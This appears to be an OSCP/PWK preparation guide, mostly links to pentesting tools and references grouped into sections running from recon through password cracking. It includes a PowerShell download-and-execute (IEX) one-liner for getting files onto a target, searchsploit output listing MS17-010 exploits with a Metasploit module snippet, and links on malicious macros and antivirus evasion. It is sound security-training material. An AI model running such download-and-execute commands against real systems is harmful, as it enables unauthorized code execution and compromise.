When it comes to report writing and note taking you should be documenting EVERYTHING that you identify. This includes output from scans, screenshots from key findings, your assumptions, and much more. Organizing these notes will pay off in the long term when it comes to writing the report. Remember you can always choose to not include information in the report if you don’t need it. But re-tracing your steps to grab screenshots, tool output, etc. will take valuable time.

Keep in mind that everyone takes notes and builds their reports differently. It is up to you to build your format and layout when you are creating these notes that fits your workflow. You’ll develop and hone this as you go through the exercises and labs. This is a very important lesson.

Here are some resources that can give you an idea of note taking tools, what templates people use for note taking, and how corporations create their pentest reports:

Reporting Tools:

Joplin: https://github.com/laurent22/joplin In Kali: apt install joplin
CherryTree: https://github.com/giuspen/cherrytree
Typora: https://typora.io/
OneNote https://www.microsoft.com/en-us/microsoft-365/onenote/digital-note-taking-app
Obsidian https://obsidian.md/

Note/Reporting Pentest Templates:

TJ Joplin Pentest Template: https://github.com/tjnull/TJ-JPT
Maik’s Pentest Template in OneNote: https://maikthulhu.github.io/2017-11-20-onenote-layout
James Hall Cherry Tree Template: https://411hall.github.io/assets/files/CTF_template.ctb
Whoisflynn OSCP Report Template: https://github.com/whoisflynn/OSCP-Exam-Report-Template

Pentest Reports:

Julio’s repo of public pentest reports: https://github.com/juliocesarfort/public-pentesting-reports

Screenshot Tools:

Kazam (In Kali): https://launchpad.net/kazam
Shutter: https://shutter-project.org/
Flameshot https://github.com/flameshot-org/flameshot

Tools to record your terminal input/output:

Script: The script command records a shell session for you so that you can look at the output that you saw at the time and you can even record with timing so that you can have a real-time playback.

https://man7.org/linux/man-pages/man1/script.1.html
Using Script to record everything in your terminal: https://ostechnix.com/record-everything-terminal/

Section 2: Getting Comfortable with Kali Linux

Kali Linux Revealed and Online Course: A good foundational course that helped me understand more about Kali Linux and it has a nice Linux Fundamentals section.

Book Link: https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf
Online Course Link: https://kali.training/lessons/introduction/
Kali Linux Documentation: https://www.kali.org/docs/

Issues or Requests that you think should be added in Kali:

Bug Tracker: https://bugs.kali.org/my_view_page.php

For troubleshooting and support issues:

Kali Linux Support Forum: https://forums.kali.org/

Other Resources for Kali Linux:

Building your own Kali ISO: https://www.kali.org/docs/development/dojo-mastering-live-build/
Use Case: https://www.offensive-security.com/kali-linux/creating-kali-i3-gaps/

Section 3 Linux Command Line Kung-Fu:

Linux Journey: A huge guide to learn about a variety of different things in Linux. All the lessons are free.

https://linuxjourney.com/

EDX Introduction to Linux:

https://www.edx.org/course/introduction-to-linux

Explainshell: Awesome resource that parses a variety of man pages from Ubuntu Manage Repository. It breaks down the commands you are using, but it is best to refer to the man pages if you have any questions: .

https://www.explainshell.com/

Hands on challenge to get comfortable with Linux:

Overthewire Bandit: https://overthewire.org/wargames/bandit/
Cmdchallenge.com: https://cmdchallenge.com/
HackerRank Linux Shell: https://www.hackerrank.com/domains/shell

Books:

The Linux Command Line (2nd Edition): https://nostarch.com/tlcl2
Linux for Hackers: https://nostarch.com/linuxbasicsforhackers
Linux Command (Learning the Shell): http://linuxcommand.org/lc3_learning_the_shell.php

Section 4: Essential Tools in Kali

Netcat: The TCP/IP Swiss Army tool. Experiment with this tool and understand what it does because you will be using this almost every day during your course and beyond.

SANS Netcat Cheatsheet: https://www.sans.org/posters/netcat-cheat-sheet/
Netcat Cheatsheet Reference: https://quickref.me/nc

Ncat: A better version of netcat in my opinion. Supports SSL communication and it is part of Nmap.

Socat: A command line based utility that establishes two bidirectional byte streams and transfers data between them. However, it has the ability to to allow multiple clients listen on a port and to reuse connections.

Socat Man Page: https://linux.die.net/man/1/socat
PowerShell and PowerCat:

PowerShell is a cross-platform scripting language built by Microsoft that can is used for task automation and configuration management. PowerShell consists of running in a shell or a command-line environment. Unlike most shells, which accept and return text, PowerShell is built on top of the .NET Common Language Runtime (CLR), and accepts and returns .NET objects. PowerShell is a very powerful tool that pentesters use as it is installed Default on Windows and it can also be installed on Linux systems as well.

Resources to learn more about PowerShell:

PowerShell Learning Resources: https://docs.microsoft.com/en-us/powershell/scripting/learn/more-powershell-learning?view=powershell-7
PowerShell for Pentesting In Kali Linux: https://www.offensive-security.com/offsec/kali-linux-powershell-pentesting/

Books:

Windows PowerShell CookBook: https://www.amazon.com/Windows-PowerShell-Cookbook-Scripting-Microsofts/dp/1449320686
Windows PowerShell Reference Book: https://www.amazon.com/Windows-PowerShell-Pocket-Reference-Scripters-dp-1449320961/dp/1449320961/
Learn PowerShell in a Month of Lunches: https://www.amazon.com/Learn-Windows-PowerShell-Month-Lunches/dp/1617294160/

Hands on Challenges for learning PowerShell:

underthewire.tech: https://underthewire.tech/wargames.htm
codewars: https://www.codewars.com/

PowerCat: A powershell version of netcat. The script can be downloaded onto a Windows target to transfer files, return a shell, or create payloads that we can call back from our target. https://github.com/besimorhino/powercat

TCPDump: Command line base Network Analysis Tool. Very useful and good to know if you are on a system that does not have a GUI. Here is a good cheat sheet I used for tcpdump when I needed to troubleshoot my exploits: https://www.andreafortuna.org/technology/networking/tcpdump-a-simple-cheatsheet/

Daniel Miessler TCPDump Guide: https://danielmiessler.com/study/tcpdump/

Wireshark: GUI based Network Analysis tool. There a lot of free PCAP samples online that you can use to understand how Wireshark works. Be careful with downloading some of these PCAP files because they may have malware in them; make sure you read where the PCAP is from before playing :D

PCAP Samples:

Netresec: https://www.netresec.com/?page=pcapfiles
Malware Traffic Analysis: https://www.malware-traffic-analysis.net/
Packettotal (Just like virustotal but for PCAP Analysis): https://packettotal.com/

Section 5: Getting Started with Bash Scripting

The bash Guide: A good guide to get you into the bash scripting

https://guide.bash.academy/

Resources to learn more about Bash Scripting:

Tutorials Point: https://www.tutorialspoint.com/unix/shell_scripting.htm
CodeAcademy: https://www.codecademy.com/learn/bash-scripting/modules/bash-scripting

Example Templates for writing your own Bash Scripts:

Section 6: Passive Reconnaissance

Take some time to learn about these tricks and techniques. They will certainly come in handy!

Google Dorks: Using various google searches that you can find that may expose sensitive information about a target.

Google Hacking Database: https://www.exploit-db.com/google-hacking-database
SANS Google Dork Cheatsheet: https://www.sans.org/security-resources/GoogleCheatSheet.pdf
Netcraft: https://netcraft.com/

Shodan: Shodan is a search engine that lets a user find specific types of computers, network devices, webcams, etc that are connected to the internet using a set of filters for there results.

Shodan: https://www.shodan.io/
Shodan Guide: https://leanpub.com/shodan
Shodan CLI: https://cli.shodan.io/

Reviewing Security Headers on Websites:

OWASP Secure Headers Project: https://owasp.org/www-project-secure-headers/
Finding Security Headers on websites: https://securityheaders.com/

Email Harvesting:

theharvester: https://github.com/laramies/theharvester
Infoga: https://github.com/m4ll0k/Infoga
recon-ng: https://bitbucket.org/LaNMaSteR53/recon-ng/overview

Additional Resources: Tools I did not use in the lab but I used them for preparation and they have come in handy for other tests.

Domaintools: http://whois.domaintools.com/
MX Toolbox: https://mxtoolbox.com/DNSLookup.aspx

Section 7: Active Reconnaissance

Introduction to DNS: If you do not know what DNS is or how it works, here is a great guide that I used to better understand it from Digital Ocean: https://www.digitalocean.com/community/tutorials/an-introduction-to-dns-terminology-components-and-concepts

If you think you have a good understanding of what DNS is then you will also need to understand how to perform forward and reverse lookups. In addition, you should also know how zone transfers work and how to perform them. Performing these tests will certainly help you better understand what your targets are in the lab. For more information about these techniques check out this article here: https://resources.infosecinstitute.com/dns-enumeration-techniques-in-linux/

Tools for DNS Enumeration:

Dnsrecon Created by Darkoperator: https://github.com/darkoperator/dnsrecon

Network Scanning:

Nmap: A tool that you should 100% totally learn about. You will probably use this everyday (If not most of the time while you are in the lab). I highly recommend you take some time to learn what the tool does, how each command switch works, each scanning technique you can run, and any other capabilities. Nmap is a powerful tool that has the ability to determine what hosts are online, what services they are running, what operating system is running on that host, and dozens of characteristics. In addition, one of the most powerful features that you should also learn is the Nmap Scripting Engine (NSE). With NSE scripts you have the ability automate a wide variety of networking tasks for your scans including vulnerability detection and exploitation. Here are my resources that I used to learn more about Nmap:

Nmap Official Guide: I used this more than the man pages. I highly recommend purchasing the full book since the official guide is missing a few chapters, such as “Detecting and Subverting Firewalls and Intrusion Detection Systems”, “Optimizing Nmap Performance”, “Port Scanning Techniques and Algorithms”, “Host Discovery (Ping Scanning)”, and more. https://nmap.org/book/toc.html
Link for Nmap Network Scanning Book (if you want to purchase it): https://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717
Nmap Scripting Engine (NSE): https://nmap.org/book/man-nse.html
ZephrFish’s Nmap Blog: https://blog.zsec.uk/nmap-rtfm/

Masscan: A powerful tool that can be used to scan a set of requested ports against your targets. As Robert Graham says “this can be done in less than 6 minutes at around 10 million packets per second”.

Daniel Miessler guide to using Masscan: https://danielmiessler.com/study/masscan/

Service Enumeration:

There are a variety of services running on so many systems…take the time to understand them! Do not just scan them and move on. Take some time to look at each of them because they could be a key for you to obtain shell access on a system!

Abatchy provided a link from 0day security that gave me a lot of ideas and things to look for that I may have missed when I skipped some the of the services in the lab. The original link is dead but you can find copies of it on the wayback machine: https://web.archive.org/web/20200309204648/http://0daysecurity.com/penetration-testing/enumeration.html

Section 8: Vulnerability Scanning

The update replaces OpenVAS and students will learn how to use use Nessus. Nessus is more stable on Kali Linux and it has a simple straightforward interface. I also was able to use the Nessus Essential key for most of my testing and to help me get familiar with how these vulnerability scanners work. Nessus is a real popular tool for vulnerability scanning in the infosec world and I certainly encourage you to play with it!

For instructions on how to install Nessus on Kali Linux you can find it here: https://www.tenable.com/blog/getting-started-with-nessus-on-kali-linux

For obtaining a Nessus key you can grab one here: https://www.tenable.com/products/nessus/nessus-essentials

Section 9: Web Application Attacks

I went back to this section and I really enjoyed how OffSec took the time to go more in-depth on how you should build your web assessment methodology. After all web apps are starting to become more popular to see on pentests.

As a pentester you need to gather information about the web application. For instance you should ask yourself these questions:

What is the purpose of the application?
What language is the web application written in?
What version is the web application running?
How is the web application being hosted?
Does the web application connect to a database? If yes; what is software the database is using and what version is it?

Identifying the components of the web application will allow you to proceed to the next phase by enumerating the components/issues you identified instead of running an exploit blindly against the web application. As always enumeration is something that pentesters must continue to do when reviewing all possible attack avenues that could compromise the web application.

Things to check for when you are enumerating a web application:

Reviewing URLs:

File Extensions
routes
hidden web directories (sitemaps like robot.txt or sitemap.xml)
non-standard ports

Reviewing the content of the web page:

Always review the source code of the web page!
Inspect every element to see how the web app works
Review the request and response headers to understand how the web application behaves when you make certain actions to it.
Check for admin consoles (Ex: Wordpress applications will have a directory /admin that can be used to access the Wordpress Admin Console)

Tools for finding Web Vulnerabilities and conducting Web Attacks:

Web Directory Scanners:

These tools are designed to brute force site structure including directories and files in websites. These tools can be able to identify hidden directory structures or webpages that can come in handy when you are in the labs or during your assessment. Each tool listed has there own set of advantages/disadvantages depending on what you are trying to use them for.

DIRB: http://dirb.sourceforge.net/
Dirsearch: https://github.com/maurosoria/dirsearch
Dirbuster: https://tools.kali.org/web-applications/dirbuster
Gobuster: https://github.com/OJ/gobuster
Wfuzz: https://github.com/xmendez/wfuzz
ffuf: https://github.com/ffuf/ffuf

BurpSuite:

A popular web application vulnerability scanner that contains a variety of features and plugins to identify web vulnerabilities on certain web applications. The tool uses an interception proxy that connects to your browser to route traffic through the Burp Suite proxy client. Once the interception proxy is configured you can start capturing and analyzing each request to and from the target web application. With theses’ captured requests a penetration tester can analyze, manipulate, and fuzz individual HTTP requests in order to identify potential parameters or injection points manually.

BurpSuite Resources:

Burp Training from Securee Ideas: https://www.youtube.com/playlist?list=PLqG-wtrX3aA_wYTrnDHoCBkKBoI4z9oLd
Bugcrowd University has a webinar that Jason Haddix created explaining about burp suite and how you can use it. You can find this recording here: https://www.bugcrowd.com/resource/introduction-to-burp-suite/

Nikto (Created by Chris Sullo & tautology0):

A web server scanner which performs comprehensive tests against web servers for multiple items. This tool can be able to scan for vulnerabilities on the web application, checks for server configuration that include multiple index files, HTTP server options, and will attempt to identify installed the version of the web server, and any plugins/software that is running on it. Please keep this in mind that this tool is can be very noisy when scanning a targets web server.

Link: https://cirt.net/Nikto2

HTTPIe https://httpie.io/:

A tool that is designed for testing, debugging, and generally interacting with APIs & HTTP servers. The http & https commands allow for creating and sending arbitrary HTTP requests.

Exploiting common Web-based Vulnerabilities:

Exploiting Admin Consoles:

When an administrative login panel is left exposed it can make it significantly easier for attackers to compromise that site, depending on the security and permissions that web developer/application have implemented. As pentesters we can execute techniques such as brute forcing, signing in with compromised credentials/obtaining credentials, or in the case of unpatched systems, access by exploiting the administration login page.

In case you would like to see some examples you can find many of these whitepapers on the Exploit Database: https://www.exploit-db.com/search?q=Authentication+Bypass

Exploit Examples:

CASAP Automated Enrolment System: https://www.exploit-db.com/exploits/49463
Online Hotel Reservation System 1.0 https://www.exploit-db.com/exploits/49420
Alumni Management System 1.0 https://www.exploit-db.com/exploits/48883
cross-site scripting (XSS):

OWASP:https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Directory Traversal Vulnerabilities:

OWASP: https://owasp.org/www-community/attacks/Path_Traversal

File Inclusion Vulnerabilities. Metaploit Unleashed: https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/ OSWAP Testing for LFI: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
SQL Injections: OWASP: https://www.owasp.org/index.php/SQL_Injection
Pentest Monkey SQL Cheat Sheets: http://pentestmonkey.net/category/cheat-sheet/sql-injection

SQL Injection Tools: I would not recommend using these tools until you have a clear understanding about SQL Databases and how a SQL Injection works. These tools below make it easy to automate the process for conducting a SQL Injection but it is possible that they can causes issues to a targets SQL Database. Here are a list of tools that I have played with to get a better understanding of how you can automate SQL Injections:

SQLmap: https://github.com/sqlmapproject/sqlmap/wiki/Usag
NoSQLMap: https://github.com/codingo/NoSQLMap

Hands on areas to improve your web attack skills:

Metasploitable 2: Contains Vulnerable Web Services such as Multidae and the Damn Vulnerable Web App (DVWA) that you can use to improve your web skills.

Link to download the machine: https://metasploit.help.rapid7.com/docs/metasploitable-2

Backup Link: https://www.vulnhub.com/entry/metasploitable-2,29/

Exploitability Guide: https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide
OWASP Juice Shop: Another vulnerable web application that contains a variety of challenges to improve your web skills. https://www.owasp.org/index.php/OWASP_Juice_Shop_Project
Overthewire Natas: A set of wargame challenges that are web base that you will need to complete in order to move to the next round. I really enjoyed their challenges when I did them! http://overthewire.org/wargames/natas/
Web Security Academy: Authors of the Web Application Handbook. This site contains a variety of practical challenges on Web App Attacks: https://portswigger.net/web-security
Other resources: Hack This Site: https://www.hackthissite.org/

Section 10: Buffer Overflows for Windows and Linux

My favorite section to learn about! The material provided in the PWK was fantastic and really straightforward. Throughout the internet you will probably find a variety of different resources to help you understand how buffer overflows work. With that being said I will provide some of my notes and resources that helped me understand how buffer overflows.

Corelan Team: A huge shout out to these guys because their articles from information security to exploit development are absolutely incredible! They have an article they posted about Stack Based Overflows that gave me a better understanding of identifying a buffer overflow in an application:

Once I finished reading the articles I decided to start going through write-ups and forums where people manually identified buffer overflows in certain applications. With these walkthroughs I used Exploit-DB to check if they had the vulnerable application in many cases. I won’t provide any of these walkthroughs but I will at least provide the binaries that you can use to manually identify buffer overflows.

Windows Binaries (Recommend that you run these on Windows 7/XP 32 bit):
Vulnserver: https://samsclass.info/127/proj/vuln-server.htm
Minishare 1.4.1: https://www.exploit-db.com/exploits/636
Savant Web Server 3.1: https://www.exploit-db.com/exploits/10434
Freefloat FTP Server 1.0: https://www.exploit-db.com/exploits/40673
Core FTP Server 1.2: https://www.exploit-db.com/exploits/39480
WarFTP 1.65: https://www.exploit-db.com/exploits/3570
VUPlayer 2.4.9: https://www.exploit-db.com/exploits/40018

Linux Binaries:

Linux Buffer Overflow: https://samsclass.info/127/proj/lbuf1.htm

Vulnerable Boxes:

Brainpan 1: https://www.vulnhub.com/entry/brainpan-1,51/
Pinky’s Palace version 1: https://www.vulnhub.com/entry/pinkys-palace-v1,225/
Stack Overflows for Beginners: https://www.vulnhub.com/entry/stack-overflows-for-beginners-101,290/
SmashTheTux: https://www.vulnhub.com/entry/smashthetux-101,138/
Pandora’s Box: https://www.vulnhub.com/entry/pandoras-box-1,111/

Other Resources:

Whitepaper Introduction to Immunity Debugger: https://www.sans.org/reading-room/whitepapers/malicious/basic-reverse-engineering-immunity-debugger-36982
Do Stack Buffer Overflow Good: https://github.com/justinsteven/dostackbufferoverflowgood
Buffer Overflows for Dummies: https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481
Vortex Stack Buffer Overflow Practice: https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
Smashing the Stack For Fun and Profit: http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf
Buffer Overflow Guide: https://github.com/johnjhacking/Buffer-Overflow-Guide
Stack based Linux Buffer Overflow: https://www.exploit-db.com/docs/english/28475-linux-stack-based-buffer-overflows.pdf

Section 11: Client-Side Attacks

Running Client-Side Attacks usually require client interaction so it’s good to have an understanding of how this works and also how you can set one up. For instance, check out the Client Side Attack Section in Metasploit Unleashed: https://www.offensive-security.com/metasploit-unleashed/client-side-attacks/

Social Engineering is one of the most common tactic that can be used to execute a proper client side attack. Depending on the tactic you use and the information you have gathered to plan this attack, you will have a better chance of success for the client to click on it. Here are some client side attacks that are commonly used:

HTML Applications:

Understanding HTA Attacks: https://www.trustedsec.com/blog/malicious-htas/
Creating HTA Files with Empire: https://dmcxblue.gitbook.io/red-team-notes/initial-acces/spear-phishing-links/tools
Template for creating your own: https://github.com/tjnull/OSCP-Stuff/blob/master/Client-Side-Attacks/Template.HTA

Tools to use for HTA Attacks:

Demiguise: https://github.com/nccgroup/demiguise
WeirdHTA: https://github.com/felamos/weirdhta
SharpShooter: https://github.com/mdsecactivebreach/SharpShooter

Microsoft Office Macros (Maldoc):

Malicious Macros: https://www.trustedsec.com/blog/malicious-macros-for-script-kiddies/
Creating your own Maldoc: https://www.pentestpartners.com/security-blog/how-to-create-poisoned-office-documents-for-your-staff-awareness-training-part-1/
Building Obfuscated Macros: https://blog.focal-point.com/how-to-build-obfuscated-macros-for-your-next-social-engineering-campaign

Tools to help you build your own Macros:

I would use these tools to learn how to make your own. Be creative when you are building your own Macros as using tools like this will be flagged by AV

MSFVenom Vbscript Injections: https://www.offensive-security.com/metasploit-unleashed/vbscript-infection-methods/
Macropack: https://github.com/sevagas/macro_pack
EvilClippy: https://github.com/outflanknl/EvilClippy

Section 12: Handling Public Exploits

There will come a time that you will need to use a public exploit on your target to see if you can obtain a shell on it. With that exploit you may need to modify shellcode or even parts of the exploit to match with your system to obtain a connection from your target. A word of advice: Be aware of the exploits you download from the public! Although these exploits can endanger any system they could also endanger yours. Make sure you review the source code and test the exploits in an contained environment before running them on your actual system.

Before you download a public exploit I would consider you take some time to review the code and understand what the exploit is suppose to actually too. If you do not understand how the code works…do some research!!! I am absolutely positive you can find proof of concepts online and walkthroughs that will explain how the exploit actually works. Not all exploits are going to work right out of the box you will need to configure them to make sure they can reach back to your attacking system. If you do not review the exploit code or make any modifications, then you are running risk that the exploit will fail, crash your target system/service, or it may allow other users to connect into the system.

Places to find exploits:

Tools for finding exploits:

Searchsploit: a command line search tool for Exploit-DB

Command Examples:

searchsploit MS-17-010 finds all cases/exploits linked to MS17-010

root@kali:~# searchsploit ms17-010
--------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                     |  Path
                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution  | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                      | exploits/windows/dos/41891.rb
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)      | exploits/windows_x86-64/remote/41987.py
Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)           | exploits/windows/remote/42031.py
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution  | exploits/windows/remote/42315.py
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42030.py
--------------------------------------------------------------------------------------------------- ----------------------------------------

Shellcodes: No Result

searchsploit -x /usr/share/exploitdb/exploits/windows/remote/43970.rb: The -x command switch allows you to examine the exploit code or information about the exploit. You can also upload nmap xml files to Searchsploit so it can find available exploits that match your target.

root@kali:~# searchsploit -x /usr/share/exploitdb/exploits/windows/remote/43970.rb

Snippet of the exploit: 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
#  Local Security Settings >
#   Local Policies >
#    Security Options >
#     Network Access: Sharing and security model for local accounts

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',
      'Description'    => %q{
        This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where
        primitive. This will then be used to overwrite the connection session information with as an
        Administrator session. From there, the normal psexec payload code execution is done.

        Exploits a type confusion between Transaction and WriteAndX requests and a race condition in
        Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy
        exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a
        named pipe.
        

Play with some of the other command switches that Searchsploit has because it will make it much easier for you to find exploits on your kali box.

Manual for Searchsploit: https://www.exploit-db.com/searchsploit

Section 13: Transferring Files to your target:

Depending on the target system you obtain access too you may not have the ability to transfer exploits or other tools you need to that system. With this being said you will need to figure out some techniques to transfer files to and from your target system. Here are a few guides I used to get a better understanding of how to transfer files onto Windows and Linux systems:

Python Modules to run services to transfer files:

python2 -m SimpleHTTPServer 80 Spins up a webserver in the directory you are located on port 80.
python3 -m http.server 80 Spins up a python version 3.X web server in the directory you are located on port 80.
python2 -m pyftpdlib -p 21 -w spins up a FTP server in the directory you are located on port 21 and it allows anonymous login access.
python3 -m pyftpdlib -p 21 -w spins up a Python 3.X FTP server in the directory you are located on port 21 and it allows anonymous login access.
Simple HTTP Server with Upload capabilities: https://github.com/tjnull/OSCP-Stuff/blob/master/Transferring-Files/HTTPServerWithUpload.py

Tools to transfer files on Windows:

Powershell: Downloading a file from your host: powershell (New-Object System.Net.WebClient).DownloadFile('https://IP Address/update.exe', 'msi-installer.exe') Downloading a file and executing with Invoke-Expression: powershell IEX (New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/msi-installer.exe')
bitsadmin. The tool is a command-line tool that you can use to create download or upload jobs and monitor their progress. You can find examples on how to use the tool here: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-examples
robocopy: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy
certutil: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

For Windows 10, Server 2016/2019:

wget:

wget http://127.0.0.1/file.exe
wget -O msi-install.exe http://127.0.0.1/file.exe
wget -b http://127.0.0.1/file.exe
wget --ftp-user=User --ftp-password=ftp://127.0.0.1/file.exe -o msi-install.exe

Other Tools/Resources:

Updog: https://github.com/sc0tfree/updog
Pwndrop: https://github.com/kgretzky/pwndrop
Awakened: Transfer files from Kali to the target machine https://awakened1712.github.io/oscp/oscp-transfer-files/
Ropnop Transferring Files from Linux to Windows (post-exploitation): https://blog.ropnop.com/transferring-files-from-kali-to-windows/

Section 14: Antivirus Bypassing

I did not spend too much time learning about this section since Metasploit encodes it payloads to bypass most anti-virus (well older versions at least). The course is pretty straight forward in this section.

Tools to play with Anti-Virus evasion:

Veil-Framework: https://github.com/Veil-Framework/Veil
Shellter: https://www.shellterproject.com/
Unicorn https://github.com/trustedsec/unicorn
UniByAV: https://github.com/Mr-Un1k0d3r/UniByAv

Tools to play with for Obfuscation:

PowerShell:

Invoke-Obfuscation: https://github.com/danielbohannon/Invoke-Obfuscation
Chimera: https://github.com/tokyoneon/Chimera

Python:

Pyarmor: https://pypi.org/project/pyarmor/
PyObfx: https://github.com/PyObfx/PyObfx

C#:

ConfuserEx: https://github.com/yck1509/ConfuserEx

Testing Payloads Publicly. (Keep in mind that submitting your samples to online scanners may be distributed to other AV engines):

Nodistribute: https://nodistribute.com/
Virustotal: https://www.virustotal.com/gui/home
Hybrid-Analysis: https://www.hybrid-analysis.com/
Any-Run: https://app.any.run
Reverse.it: https://reverse.it
Anti-Virus Evasion Tool: https://github.com/govolution/avet
DefenderCheck: https://github.com/matterpreter/DefenderCheck
ThreatCheck: https://github.com/rasta-mouse/ThreatCheck

Section 15: Privilege Escalation

In this section you will a range of techniques from getting administrative access from a kernel exploit or through a misconfigured service. The possibilities are endless, and make sure you find the ones that will work for you. In order to get an understanding of this section I recommend applying your knowledge through Vulnhub or Hackthebox to improve your skills in this area. I know there are scripts for automating this process but at some points those scripts can miss something very important on your target that you need to escalate your privileges. Something you should keep in mind :D.
For this section I am going to break into two parts: Windows and Linux Privilege Escalation Techniques.

Windows Privilege Escalation Guides:

Fuzzysecurity Windows Privilege Escalation Fundamentals: Shout out to fuzzysec for taking the time to write this because this is an amazing guide that will help you understand Privilege escalation techniques in Windows. http://www.fuzzysecurity.com/tutorials/16.html
Pwnwiki Windows Privilege Escalation Commands: http://pwnwiki.io/#!privesc/windows/index.md
Absolomb’s Security Blog: Windows Privilege Escalation Guide https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Pentest.blog: Windows Privilege Escalation Methods for Pentesters https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
SharpAllTheThings: https://github.com/N7WEra/SharpAllTheThings
LOLBAS (Created by Oddvar Moe): https://lolbas-project.github.io/

Windows Privilege Escalation Tools:

JAWS (Created by 411Hall): A cool windows enumeration script written in PowerShell. https://github.com/411Hall/JAWS/commits?author=411Hall
Windows Exploit Suggester Next Generation: https://github.com/bitsadmin/wesng
Sherlock (Created by RastaMouse): Another cool PowerShell script that finds missing software patches for local privilege escalation techniques in Windows. https://github.com/rasta-mouse/Sherlock
WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Watson: https://github.com/rasta-mouse/Watson
Seatbelt: https://github.com/GhostPack/Seatbelt
Powerless: https://github.com/M4ximuss/Powerless
Powerview: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

Token Manipulation:

Rotten Potato: https://github.com/breenmachine/RottenPotatoNG
Juicy Potato: https://github.com/ohpe/juicy-potato

Other Resources for Windows Privilege Escalation Techniques: https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194

Linux Privilege Escalation Guides: The only guide I probably ever used to help me understand privilege escalation techniques in Linux systems was from g0tmi1k post. This blog is a must that everyone should have for preparing for the OSCP in my opinion. You can find his guide here: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

GTFOBins (I have to thank Ippsec for sharing this with me): Contains a curated list of Unix binaries that that have the ability to be exploited by an attacker to bypass local security restrictions on a Linux system. https://gtfobins.github.io/

PayloadsAllTheThings Linux Priv Esc Guide: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md

Linux Privilege Escalation Tools:

LinEnum: A great Linux privilege escalation checker that is still maintained by the guys at rebootuser.com. You can find there tool here: https://github.com/rebootuser/LinEnum

Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2
LinPEAS: [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS]

One thing that I will mention is if you want to practice your Linux privilege escalation, I highly recommend you take a look at Lin.Security vulnerable box created by in.security! The box was designed to help people understand how certain applications and service that are misconfigured can be easily abused by an attacker. This box really helped me improved my privilege escalation skills and techniques on Linux systems.

Section 16: Password Cracking

In this section you need to understand the basics of password attacks. Identify the differences between Windows (NTLM) hashes and Linux hashes. In addition, you will also need to understand the different tools that you can use to conduct online and offline password attacks. Typically online password cracking involves sending attempts to the authentication service; like a web form or terminal service. In offline attacks you will carry out the cracking locally, like using John The Ripper to crack a zip file on your local machine. Here is a list of resources that I have used that helped me better understand how password cracking works:

Introduction to Password Cracking: https://alexandreborgesbrazil.files.wordpress.com/2013/08/introduction_to_password_cracking_part_1.pdf

Offline Tools for Password Cracking:

Hashcat: https://hashcat.net/hashcat/ Sample Hashes to test with Hashcat: https://hashcat.net/wiki/doku.php?id=example_hashes
John the Ripper: https://www.openwall.com/john/
Metasploit Unleashed using John the Ripper with Hashdump: https://www.offensive-security.com/metasploit-unleashed/john-ripper/

Online Tools for Password Cracking:

THC Hydra: https://github.com/vanhauser-thc/thc-hydra
Crowbar: https://github.com/galkan/crowbar

Wordlist generators:

Cewl: https://digi.ninja/projects/cewl.php
Crunch: https://tools.kali.org/password-attacks/crunch
Cupp (In Kali Linux): https://github.com/Mebus/cupp

Tools to check the hash type:

Hash-Identifier: https://github.com/psypanda/hashID

Tools to dump for hashes:

Mimikatz: https://github.com/gentilkiwi/mimikatz

Mimipenguin: https://github.com/huntergregal/mimipenguin

Pypykatz: https://github.com/skelsec/pypykatz
